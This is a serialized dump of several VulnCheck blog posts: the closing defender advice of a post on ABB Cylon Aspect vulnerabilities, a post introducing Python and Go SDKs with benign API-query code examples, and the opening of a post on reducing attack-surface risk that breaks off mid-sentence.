vulnerabilities, especially as critical infrastructure software often remains online.",[18,63422,63423],{},[68,63424],{":width":10862,"alt":63425,"src":63426},"Linear Merge Shodan","\u002Fblog\u002Fexploring-abb-ics-vulns\u002Fgreynoise-abb.png",[18,63428,63429],{},"Security professionals should ensure that customers keep such high-risk systems patched, as ABB advises against exposing these systems online at all. This highlights the risk associated with unpatched and publicly accessible control systems.",[61,63431,63433],{"id":63432},"what-defenders-can-do","What Defenders Can Do",[22,63435,63436,63439,63442],{},[25,63437,63438],{},"If your organization uses ABB Cylon Aspect, ensure that these devices are patched and up to date.",[25,63440,63441],{},"Ensure the ABB devices and other Industrial Control Systems are not accessible on the internet.",[25,63443,63444],{},"Use the detection signatures we’ve provided to monitor for any signs of exploitation.",[61,63446,202],{"id":201},[18,63448,63449,63450,982,63453,63281,63456,982,63459,63288],{},"The VulnCheck Initial Access team is always looking to advance the state of attack on initial access vulnerabilities. For more research like this, see our blogs, ",[47,63451,40447],{"href":53829,"rel":63452},[51],[47,63454,35931],{"href":53837,"rel":63455},[51],[47,63457,1245],{"href":45535,"rel":63458},[51],[47,63460,216],{"href":214,"rel":63461},[51],{"title":219,"searchDepth":220,"depth":220,"links":63463},[63464,63465,63466,63467,63468,63469],{"id":63361,"depth":220,"text":63362},{"id":63371,"depth":220,"text":63372},{"id":63399,"depth":220,"text":63400},{"id":63416,"depth":220,"text":63417},{"id":63432,"depth":220,"text":63433},{"id":201,"depth":220,"text":202},"2024-10-30","We explore two key vulnerabilities in ABB's building automation and energy management software, ABB Cylon Aspect.",{"slug":63473},"exploring-abb-ics-vulns","\u002Fblog\u002Fexploring-abb-ics-vulns",{"title":58308,"description":63471},"blog\u002Fexploring-abb-ics-vulns",[242,63478],"ics-ot","oDBK6maYOjDrVqC1wK9Wdx9edsp6_66n7awQEY8xQCI",{"id":63481,"title":63482,"articles":7,"authors":63483,"body":63485,"date":64266,"description":64267,"extension":234,"image":7,"link":7,"meta":64268,"navigation":237,"path":64270,"seo":64271,"series":7,"stem":64272,"subtype":7,"tags":64273,"__hash__":64274},"blog\u002Fblog\u002Fpython-go-sdk.md","Bring VulnCheck Intelligence to Your Python and Go Apps with Our New SDKs",[63484],{"name":45340,"avatar":45341,"link":45342,"linkName":45343},{"type":15,"value":63486,"toc":64259},[63487,63490,63494,63497,63502,63905,63908,63912,63915,64184,64187,64191,64194,64204,64210,64213,64217,64245,64247,64249,64251,64256],[18,63488,63489],{},"At VulnCheck, we continue to expand access to our exploit intelligence. Following the success of our CLI tool, which brings powerful command-line capabilities to security teams, we’re now taking a step further by introducing VulnCheck SDKs for Python and Go. These SDKs empower developers to seamlessly integrate VulnCheck’s intelligence into their applications, automate vulnerability checks, and explore data in ways that best fit their development environment.",[61,63491,63493],{"id":63492},"code-vulncheck-into-your-python-and-go-applications-faster","Code VulnCheck into Your Python and Go Applications Faster",[18,63495,63496],{},"With the VulnCheck SDKs for Python and Go, integrating vulnerability intelligence into your projects becomes effortless. These SDKs abstract away the complexities of directly interacting with the VulnCheck API, providing pre-built functions and classes for common tasks, so you don’t have to manually write HTTP requests or parse JSON.",[18,63498,63499],{},[295,63500,63501],{},"Example: Integrating VulnCheck into Your Python Code",[1354,63503,63505],{"className":11719,"code":63504,"filename":2539,"language":11721,"meta":219,"style":219},"import vulncheck_sdk\n\n# First let's setup a few variables to help us\nDEFAULT_HOST = \"https:\u002F\u002Fapi.vulncheck.com\"\nDEFAULT_API = DEFAULT_HOST + \"\u002Fv3\"\nTOKEN = os.environ[\"VULNCHECK_API_TOKEN\"] # Remember to store your token securely!\n\n# Now let's create a configuration object\nconfiguration = vulncheck_sdk.Configuration(host=DEFAULT_API)\nconfiguration.api_key[\"Bearer\"] = TOKEN\n\n# Pass that config object to our API client and now...\nwith vulncheck_sdk.ApiClient(configuration) as api_client:\n # We can use two classes to explore the VulnCheck API: EndpointsApi & IndicesApi\n\n ### EndpointsApi has methods to query every endpoint except `\u002Fv3\u002Findex`\n # See the full list of endpoints here: https:\u002F\u002Fdocs.vulncheck.com\u002Fapi\n endpoints_client = vulncheck_sdk.EndpointsApi(api_client)\n\n # CPE\n cpe = \"cpe:\u002Fa:microsoft:internet_explorer:8.0.6001:beta\"\n api_response = endpoints_client.cpe_get(cpe)\n for cve in api_response.data:\n print(cve)\n\n ### IndicesApi has methods for each index\n indices_client = vulncheck_sdk.IndicesApi(api_client)\n\n # VulnCheck NVD\n query_params = vulncheck_sdk.ParamsIdxReqParams(cve=\"CVE-2019-19781\")\n api_response = indices_client.index_vulncheck_nvd2_get(query_params)\n\n print(api_response.data)\n",[886,63506,63507,63514,63518,63523,63537,63556,63586,63590,63595,63622,63647,63651,63656,63681,63686,63690,63695,63700,63721,63725,63730,63744,63766,63786,63797,63801,63806,63826,63830,63835,63864,63885,63889],{"__ignoreMap":219},[1373,63508,63509,63511],{"class":1375,"line":1376},[1373,63510,19043],{"class":4636},[1373,63512,63513],{"class":4640}," vulncheck_sdk\n",[1373,63515,63516],{"class":1375,"line":220},[1373,63517,6520],{"emptyLinePlaceholder":237},[1373,63519,63520],{"class":1375,"line":1266},[1373,63521,63522],{"class":4630},"# First let's setup a few variables to help us\n",[1373,63524,63525,63528,63530,63532,63535],{"class":1375,"line":1852},[1373,63526,63527],{"class":2326},"DEFAULT_HOST",[1373,63529,8575],{"class":1397},[1373,63531,4883],{"class":1387},[1373,63533,63534],{"class":1391},"https:\u002F\u002Fapi.vulncheck.com",[1373,63536,19057],{"class":1387},[1373,63538,63539,63542,63544,63547,63549,63551,63554],{"class":1375,"line":4692},[1373,63540,63541],{"class":2326},"DEFAULT_API",[1373,63543,8575],{"class":1397},[1373,63545,63546],{"class":2326}," DEFAULT_HOST",[1373,63548,15478],{"class":1397},[1373,63550,4883],{"class":1387},[1373,63552,63553],{"class":1391},"\u002Fv3",[1373,63555,19057],{"class":1387},[1373,63557,63558,63561,63563,63566,63568,63572,63574,63576,63579,63581,63583],{"class":1375,"line":4724},[1373,63559,63560],{"class":2326},"TOKEN",[1373,63562,8575],{"class":1397},[1373,63564,63565],{"class":4640}," os",[1373,63567,59],{"class":1383},[1373,63569,63571],{"class":63570},"squCx","environ",[1373,63573,7035],{"class":1383},[1373,63575,183],{"class":1387},[1373,63577,63578],{"class":1391},"VULNCHECK_API_TOKEN",[1373,63580,183],{"class":1387},[1373,63582,15050],{"class":1383},[1373,63584,63585],{"class":4630}," # Remember to store your token securely!\n",[1373,63587,63588],{"class":1375,"line":4756},[1373,63589,6520],{"emptyLinePlaceholder":237},[1373,63591,63592],{"class":1375,"line":4768},[1373,63593,63594],{"class":4630},"# Now let's create a configuration object\n",[1373,63596,63597,63600,63602,63605,63607,63610,63612,63615,63617,63620],{"class":1375,"line":4792},[1373,63598,63599],{"class":4640},"configuration ",[1373,63601,5417],{"class":1397},[1373,63603,63604],{"class":4640}," vulncheck_sdk",[1373,63606,59],{"class":1383},[1373,63608,63609],{"class":11735},"Configuration",[1373,63611,1384],{"class":1383},[1373,63613,63614],{"class":19096},"host",[1373,63616,5417],{"class":1397},[1373,63618,63541],{"class":63619},"sk96k",[1373,63621,11875],{"class":1383},[1373,63623,63624,63626,63628,63631,63633,63635,63638,63640,63642,63644],{"class":1375,"line":4798},[1373,63625,45434],{"class":4640},[1373,63627,59],{"class":1383},[1373,63629,63630],{"class":63570},"api_key",[1373,63632,7035],{"class":1383},[1373,63634,183],{"class":1387},[1373,63636,63637],{"class":1391},"Bearer",[1373,63639,183],{"class":1387},[1373,63641,15050],{"class":1383},[1373,63643,8575],{"class":1397},[1373,63645,63646],{"class":2326}," TOKEN\n",[1373,63648,63649],{"class":1375,"line":4806},[1373,63650,6520],{"emptyLinePlaceholder":237},[1373,63652,63653],{"class":1375,"line":4817},[1373,63654,63655],{"class":4630},"# Pass that config object to our API client and now...\n",[1373,63657,63658,63661,63663,63665,63668,63670,63672,63674,63676,63679],{"class":1375,"line":4825},[1373,63659,63660],{"class":4636},"with",[1373,63662,63604],{"class":4640},[1373,63664,59],{"class":1383},[1373,63666,63667],{"class":11735},"ApiClient",[1373,63669,1384],{"class":1383},[1373,63671,45434],{"class":11735},[1373,63673,2230],{"class":1383},[1373,63675,57330],{"class":4636},[1373,63677,63678],{"class":4640}," api_client",[1373,63680,11747],{"class":1383},[1373,63682,63683],{"class":1375,"line":4835},[1373,63684,63685],{"class":4630}," # We can use two classes to explore the VulnCheck API: EndpointsApi & IndicesApi\n",[1373,63687,63688],{"class":1375,"line":4843},[1373,63689,6520],{"emptyLinePlaceholder":237},[1373,63691,63692],{"class":1375,"line":4849},[1373,63693,63694],{"class":4630}," ### EndpointsApi has methods to query every endpoint except `\u002Fv3\u002Findex`\n",[1373,63696,63697],{"class":1375,"line":4877},[1373,63698,63699],{"class":4630}," # See the full list of endpoints here: https:\u002F\u002Fdocs.vulncheck.com\u002Fapi\n",[1373,63701,63702,63705,63707,63709,63711,63714,63716,63719],{"class":1375,"line":4915},[1373,63703,63704],{"class":4640}," endpoints_client ",[1373,63706,5417],{"class":1397},[1373,63708,63604],{"class":4640},[1373,63710,59],{"class":1383},[1373,63712,63713],{"class":11735},"EndpointsApi",[1373,63715,1384],{"class":1383},[1373,63717,63718],{"class":11735},"api_client",[1373,63720,11875],{"class":1383},[1373,63722,63723],{"class":1375,"line":4931},[1373,63724,6520],{"emptyLinePlaceholder":237},[1373,63726,63727],{"class":1375,"line":4947},[1373,63728,63729],{"class":4630}," # CPE\n",[1373,63731,63732,63735,63737,63739,63742],{"class":1375,"line":4952},[1373,63733,63734],{"class":4640}," cpe ",[1373,63736,5417],{"class":1397},[1373,63738,4883],{"class":1387},[1373,63740,63741],{"class":1391},"cpe:\u002Fa:microsoft:internet_explorer:8.0.6001:beta",[1373,63743,19057],{"class":1387},[1373,63745,63746,63749,63751,63754,63756,63759,63761,63764],{"class":1375,"line":6776},[1373,63747,63748],{"class":4640}," api_response ",[1373,63750,5417],{"class":1397},[1373,63752,63753],{"class":4640}," endpoints_client",[1373,63755,59],{"class":1383},[1373,63757,63758],{"class":11735},"cpe_get",[1373,63760,1384],{"class":1383},[1373,63762,63763],{"class":11735},"cpe",[1373,63765,11875],{"class":1383},[1373,63767,63768,63771,63774,63777,63780,63782,63784],{"class":1375,"line":6781},[1373,63769,63770],{"class":4636}," for",[1373,63772,63773],{"class":4640}," cve ",[1373,63775,63776],{"class":4636},"in",[1373,63778,63779],{"class":4640}," api_response",[1373,63781,59],{"class":1383},[1373,63783,9156],{"class":63570},[1373,63785,11747],{"class":1383},[1373,63787,63788,63791,63793,63795],{"class":1375,"line":7524},[1373,63789,63790],{"class":1379}," print",[1373,63792,1384],{"class":1383},[1373,63794,242],{"class":11735},[1373,63796,11875],{"class":1383},[1373,63798,63799],{"class":1375,"line":7530},[1373,63800,6520],{"emptyLinePlaceholder":237},[1373,63802,63803],{"class":1375,"line":7546},[1373,63804,63805],{"class":4630}," ### IndicesApi has methods for each index\n",[1373,63807,63808,63811,63813,63815,63817,63820,63822,63824],{"class":1375,"line":7571},[1373,63809,63810],{"class":4640}," indices_client ",[1373,63812,5417],{"class":1397},[1373,63814,63604],{"class":4640},[1373,63816,59],{"class":1383},[1373,63818,63819],{"class":11735},"IndicesApi",[1373,63821,1384],{"class":1383},[1373,63823,63718],{"class":11735},[1373,63825,11875],{"class":1383},[1373,63827,63828],{"class":1375,"line":7598},[1373,63829,6520],{"emptyLinePlaceholder":237},[1373,63831,63832],{"class":1375,"line":7615},[1373,63833,63834],{"class":4630}," # VulnCheck NVD\n",[1373,63836,63837,63840,63842,63844,63846,63849,63851,63853,63855,63857,63860,63862],{"class":1375,"line":7635},[1373,63838,63839],{"class":4640}," query_params ",[1373,63841,5417],{"class":1397},[1373,63843,63604],{"class":4640},[1373,63845,59],{"class":1383},[1373,63847,63848],{"class":11735},"ParamsIdxReqParams",[1373,63850,1384],{"class":1383},[1373,63852,242],{"class":19096},[1373,63854,5417],{"class":1397},[1373,63856,183],{"class":1387},[1373,63858,63859],{"class":1391},"CVE-2019-19781",[1373,63861,183],{"class":1387},[1373,63863,11875],{"class":1383},[1373,63865,63866,63868,63870,63873,63875,63878,63880,63883],{"class":1375,"line":7640},[1373,63867,63748],{"class":4640},[1373,63869,5417],{"class":1397},[1373,63871,63872],{"class":4640}," indices_client",[1373,63874,59],{"class":1383},[1373,63876,63877],{"class":11735},"index_vulncheck_nvd2_get",[1373,63879,1384],{"class":1383},[1373,63881,63882],{"class":11735},"query_params",[1373,63884,11875],{"class":1383},[1373,63886,63887],{"class":1375,"line":7648},[1373,63888,6520],{"emptyLinePlaceholder":237},[1373,63890,63891,63894,63896,63899,63901,63903],{"class":1375,"line":7672},[1373,63892,63893],{"class":1379}," print",[1373,63895,1384],{"class":1383},[1373,63897,63898],{"class":11735},"api_response",[1373,63900,59],{"class":1383},[1373,63902,9156],{"class":63570},[1373,63904,11875],{"class":1383},[18,63906,63907],{},"With just a few lines of code, you're able to connect to the VulnCheck API, retrieve Vulnerability, Exploit and IP Intelligence, and accelerate your security projects. This reduces development time and lets you focus on the core functionality of your application or automations.",[61,63909,63911],{"id":63910},"pre-built-functions-for-common-tasks","Pre-built Functions for Common Tasks",[18,63913,63914],{},"One of the best parts of using the VulnCheck SDK is that it comes packed with pre-built functions for accessing VulnCheck Intelligence. For instance, say you’re managing dependencies in a Python project and want to quickly check which vulnerabilities are associated with a particular PURL. The VulnCheck SDK for Python allows you to do this in just a few lines of code:",[1354,63916,63918],{"className":11719,"code":63917,"filename":2539,"language":11721,"meta":219,"style":219},"import vulncheck_sdk\nfrom vulncheck_sdk.models.v3controllers_purl_response_data import (\n V3controllersPurlResponseData,\n)\n\nDEFAULT_HOST = \"https:\u002F\u002Fapi.vulncheck.com\"\nDEFAULT_API = DEFAULT_HOST + \"\u002Fv3\"\nTOKEN = os.environ[\"VULNCHECK_API_TOKEN\"]\n\nconfiguration = vulncheck_sdk.Configuration(host=DEFAULT_API)\nconfiguration.api_key[\"Bearer\"] = TOKEN\n\nwith vulncheck_sdk.ApiClient(configuration) as api_client:\n endpoints_client = vulncheck_sdk.EndpointsApi(api_client)\n\n purl = \"pkg:hex\u002Fcoherence@0.1.2\"\n\n api_response = endpoints_client.purl_get(purl)\n data: V3controllersPurlResponseData = api_response.data\n\n print(data.cves)\n",[886,63919,63920,63926,63947,63954,63958,63962,63974,63990,64012,64016,64038,64060,64064,64086,64104,64108,64122,64126,64146,64165,64169],{"__ignoreMap":219},[1373,63921,63922,63924],{"class":1375,"line":1376},[1373,63923,19043],{"class":4636},[1373,63925,63513],{"class":4640},[1373,63927,63928,63931,63933,63935,63938,63940,63943,63945],{"class":1375,"line":220},[1373,63929,63930],{"class":4636},"from",[1373,63932,63604],{"class":4640},[1373,63934,59],{"class":1383},[1373,63936,63937],{"class":4640},"models",[1373,63939,59],{"class":1383},[1373,63941,63942],{"class":4640},"v3controllers_purl_response_data ",[1373,63944,19043],{"class":4636},[1373,63946,4803],{"class":1383},[1373,63948,63949,63952],{"class":1375,"line":1266},[1373,63950,63951],{"class":4640}," V3controllersPurlResponseData",[1373,63953,9062],{"class":1383},[1373,63955,63956],{"class":1375,"line":1852},[1373,63957,11875],{"class":1383},[1373,63959,63960],{"class":1375,"line":4692},[1373,63961,6520],{"emptyLinePlaceholder":237},[1373,63963,63964,63966,63968,63970,63972],{"class":1375,"line":4724},[1373,63965,63527],{"class":2326},[1373,63967,8575],{"class":1397},[1373,63969,4883],{"class":1387},[1373,63971,63534],{"class":1391},[1373,63973,19057],{"class":1387},[1373,63975,63976,63978,63980,63982,63984,63986,63988],{"class":1375,"line":4756},[1373,63977,63541],{"class":2326},[1373,63979,8575],{"class":1397},[1373,63981,63546],{"class":2326},[1373,63983,15478],{"class":1397},[1373,63985,4883],{"class":1387},[1373,63987,63553],{"class":1391},[1373,63989,19057],{"class":1387},[1373,63991,63992,63994,63996,63998,64000,64002,64004,64006,64008,64010],{"class":1375,"line":4768},[1373,63993,63560],{"class":2326},[1373,63995,8575],{"class":1397},[1373,63997,63565],{"class":4640},[1373,63999,59],{"class":1383},[1373,64001,63571],{"class":63570},[1373,64003,7035],{"class":1383},[1373,64005,183],{"class":1387},[1373,64007,63578],{"class":1391},[1373,64009,183],{"class":1387},[1373,64011,7103],{"class":1383},[1373,64013,64014],{"class":1375,"line":4792},[1373,64015,6520],{"emptyLinePlaceholder":237},[1373,64017,64018,64020,64022,64024,64026,64028,64030,64032,64034,64036],{"class":1375,"line":4798},[1373,64019,63599],{"class":4640},[1373,64021,5417],{"class":1397},[1373,64023,63604],{"class":4640},[1373,64025,59],{"class":1383},[1373,64027,63609],{"class":11735},[1373,64029,1384],{"class":1383},[1373,64031,63614],{"class":19096},[1373,64033,5417],{"class":1397},[1373,64035,63541],{"class":63619},[1373,64037,11875],{"class":1383},[1373,64039,64040,64042,64044,64046,64048,64050,64052,64054,64056,64058],{"class":1375,"line":4806},[1373,64041,45434],{"class":4640},[1373,64043,59],{"class":1383},[1373,64045,63630],{"class":63570},[1373,64047,7035],{"class":1383},[1373,64049,183],{"class":1387},[1373,64051,63637],{"class":1391},[1373,64053,183],{"class":1387},[1373,64055,15050],{"class":1383},[1373,64057,8575],{"class":1397},[1373,64059,63646],{"class":2326},[1373,64061,64062],{"class":1375,"line":4817},[1373,64063,6520],{"emptyLinePlaceholder":237},[1373,64065,64066,64068,64070,64072,64074,64076,64078,64080,64082,64084],{"class":1375,"line":4825},[1373,64067,63660],{"class":4636},[1373,64069,63604],{"class":4640},[1373,64071,59],{"class":1383},[1373,64073,63667],{"class":11735},[1373,64075,1384],{"class":1383},[1373,64077,45434],{"class":11735},[1373,64079,2230],{"class":1383},[1373,64081,57330],{"class":4636},[1373,64083,63678],{"class":4640},[1373,64085,11747],{"class":1383},[1373,64087,64088,64090,64092,64094,64096,64098,64100,64102],{"class":1375,"line":4835},[1373,64089,63704],{"class":4640},[1373,64091,5417],{"class":1397},[1373,64093,63604],{"class":4640},[1373,64095,59],{"class":1383},[1373,64097,63713],{"class":11735},[1373,64099,1384],{"class":1383},[1373,64101,63718],{"class":11735},[1373,64103,11875],{"class":1383},[1373,64105,64106],{"class":1375,"line":4843},[1373,64107,6520],{"emptyLinePlaceholder":237},[1373,64109,64110,64113,64115,64117,64120],{"class":1375,"line":4849},[1373,64111,64112],{"class":4640}," purl ",[1373,64114,5417],{"class":1397},[1373,64116,4883],{"class":1387},[1373,64118,64119],{"class":1391},"pkg:hex\u002Fcoherence@0.1.2",[1373,64121,19057],{"class":1387},[1373,64123,64124],{"class":1375,"line":4877},[1373,64125,6520],{"emptyLinePlaceholder":237},[1373,64127,64128,64130,64132,64134,64136,64139,64141,64144],{"class":1375,"line":4915},[1373,64129,63748],{"class":4640},[1373,64131,5417],{"class":1397},[1373,64133,63753],{"class":4640},[1373,64135,59],{"class":1383},[1373,64137,64138],{"class":11735},"purl_get",[1373,64140,1384],{"class":1383},[1373,64142,64143],{"class":11735},"purl",[1373,64145,11875],{"class":1383},[1373,64147,64148,64151,64153,64156,64158,64160,64162],{"class":1375,"line":4931},[1373,64149,64150],{"class":4640}," data",[1373,64152,4606],{"class":1383},[1373,64154,64155],{"class":4640}," V3controllersPurlResponseData ",[1373,64157,5417],{"class":1397},[1373,64159,63779],{"class":4640},[1373,64161,59],{"class":1383},[1373,64163,64164],{"class":63570},"data\n",[1373,64166,64167],{"class":1375,"line":4947},[1373,64168,6520],{"emptyLinePlaceholder":237},[1373,64170,64171,64173,64175,64177,64179,64182],{"class":1375,"line":4952},[1373,64172,63893],{"class":1379},[1373,64174,1384],{"class":1383},[1373,64176,9156],{"class":11735},[1373,64178,59],{"class":1383},[1373,64180,64181],{"class":63570},"cves",[1373,64183,11875],{"class":1383},[18,64185,64186],{},"This example shows how easy it is to lookup the CVE’s for a given PURL using the already provided methods. The SDK takes care of handling the request and parsing the response into a Python object that you can easily explore.",[61,64188,64190],{"id":64189},"explore-and-visualize-data-w-jupyter-notebook","Explore and Visualize Data w\u002F Jupyter Notebook",[18,64192,64193],{},"But VulnCheck isn’t just for applications, it can also help identify trends in security and guide decision-making. The VulnCheck SDK for Python integrates seamlessly with Jupyter Notebooks, allowing data scientists, developers and security analysts to explore and visualize data interactively. This is especially useful for investigating patterns across vulnerabilities, such as botnet-related CVEs.",[18,64195,64196,64197,982,64200,64203],{},"Imagine you want to analyze botnet-related vulnerabilities. Here’s how you can pull data from the VulnCheck API and visualize it with Python's ",[886,64198,64199],{},"matplotlib",[886,64201,64202],{},"pandas"," libraries:",[18,64205,64206],{},[68,64207],{":width":10862,"alt":64208,"src":64209},"Botnets Jupyter Notebook","\u002Fblog\u002Fpython-go-sdk\u002Fchart-example.png",[18,64211,64212],{},"This approach is perfect for interactive data exploration and quickly uncovering trends, such as which botnets are associated with the most vulnerabilities.",[61,64214,64216],{"id":64215},"learn-more-about-vulnchecks-new-sdks-jupyter-notebook-integration","Learn more about VulnCheck’s new SDKs & Jupyter Notebook Integration",[18,64218,64219,64224,64225,64224,64230,64224,64235,64224,64240],{},[47,64220,64223],{"href":64221,"rel":64222,":target":10881},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fsdk-go",[51],"Go SDK on Github"," | ",[47,64226,64229],{"href":64227,"rel":64228,":target":10881},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Fgo-sdk\u002Fintroduction",[51],"Go SDK Docs",[47,64231,64234],{"href":64232,"rel":64233,":target":10881},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fsdk-python",[51],"Python SDK on Github",[47,64236,64239],{"href":64237,"rel":64238,":target":10881},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Fpython-sdk\u002Fintroduction",[51],"Python SDK Docs",[47,64241,64244],{"href":64242,"rel":64243,":target":10881},"https:\u002F\u002Fdocs.vulncheck.com\u002Fintegrations\u002Fjupyter",[51],"Jupyter Notebook",[61,64246,202],{"id":201},[18,64248,205],{},[18,64250,208],{},[18,64252,211,64253,217],{},[47,64254,216],{"href":214,"rel":64255},[51],[2901,64257,64258],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .squCx, html code.shiki .squCx{--shiki-light:#E53935;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .sk96k, html code.shiki .sk96k{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":64260},[64261,64262,64263,64264,64265],{"id":63492,"depth":220,"text":63493},{"id":63910,"depth":220,"text":63911},{"id":64189,"depth":220,"text":64190},{"id":64215,"depth":220,"text":64216},{"id":201,"depth":220,"text":202},"2024-10-24","VulnCheck delivers intelligence to Your Python and Go Applications with our new SDKs",{"slug":64269},"python-go-sdk","\u002Fblog\u002Fpython-go-sdk",{"title":63482,"description":64267},"blog\u002Fpython-go-sdk",[33173],"T2wlaAulucp0sO9MqbXKxx-ncR6HOI-tPRCaBwYFw3Q",{"id":64276,"title":64277,"articles":7,"authors":64278,"body":64280,"date":64448,"description":64449,"extension":234,"image":7,"link":7,"meta":64450,"navigation":237,"path":64452,"seo":64453,"series":64454,"stem":64458,"subtype":7,"tags":7,"__hash__":64459},"blog\u002Fblog\u002Freducing-attack-surface-risk-oem-series.md","Reducing Attack Surface Risk",[64279],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":64281,"toc":64446},[64282,64285,64288,64291,64294,64297,64300,64309,64323,64326,64329,64332,64335,64338,64341,64355,64358,64364,64372,64375,64383,64386,64400,64403,64406,64409,64415,64418,64435,64438,64441,64444],[18,64283,64284],{},"Every organization and every enterprise response team faces a growing and evolving attack surface. Product managers at all cybersecurity vendors are looking to accommodate those objectives.",[18,64286,64287],{},"However, reducing exposures in the attack surface means very different things from organization to organization, and the variability of emerging threats can affect how cyber teams respond to those threats.",[18,64289,64290],{},"An organization’s attack surface varies based on accessible devices connected to the network, web services, and APIs and the exposed vulnerabilities on them. Layer in your adversaries, their tactics, their objectives, the groups to which they belong and their attack techniques and tactics - - and your hands are full as the CISO.",[18,64292,64293],{},"Most cybersecurity products have a significant reliance on external data and intelligence to enrich the accuracy and usefulness of its output for customers. However, many intelligence sources are not machine-readable, and that lack of legibility forces users to work harder to reduce the signal to noise ratio when managing vulnerabilities.",[18,64295,64296],{},"This limits the effectiveness of any cybersecurity product, because the data has to be analyzed by humans. This means the data isn’t able to be consumed quickly enough to prevent vulnerabilities from exploitation by threat actors. Which for product managers building cybersecurity products, means more bugs and escalated support calls by customers.",[18,64298,64299],{},"While the reduction of an organization’s overall attack surface is a general goal of most products, exposure management platforms (EMP), like Sevco Security are purpose-built to ensure that organizations have a material reduction in securing areas of the business that prevents attacks from becoming a full-scale breach. We’ll look more at this below to see a tangible example of how exploit intelligence integrates with an actual EMP solution that are built on the foundation of providing a complete asset inventory. (more on this below)",[64301,64302,64306],"callout",{"color":64303,"icon":64304,"target":10881,"to":64305},"secondary","i-mdi-information-box-outline","https:\u002F\u002Fwwv.vulncheck.com\u002Frethinking-intel-cyber-platforms-whitepaper",[18,64307,64308],{},"Download the Rethinking Intelligence in Cybersecurity Platforms Whitepaper to learn more about how to integrate intelligence into your cybersecurity product.",[18,64310,64311,64314,64316,64317,64322],{},[295,64312,64313],{},"The Rise of Exploits - Knowing More About Relevant Threat Actors",[1823,64315],{},"\nWith a 180% increase in breaches with an exploited vulnerability as reported in the ",[47,64318,64321],{"href":64319,"rel":64320,"target":10881},"https:\u002F\u002Fwww.verizon.com\u002Fbusiness\u002Fresources\u002Freports\u002Fdbir\u002F",[51],"2024 Verizon Data Breach Investigation Report",", the need for reliable intelligence that can supercharge the platform is essential.",[18,64324,64325],{},"Why? Because it only takes one vulnerability, and just one attacker to weaponize any random vulnerability.",[18,64327,64328],{},"When vulnerability and exploit intelligence does not outpace the adversaries, and when manual effort is required to consume it, cybersecurity products fail to deliver their full, potential value. Product managers can rethink their workflows and the ways to use intelligence sources to help their end-users respond and defend at 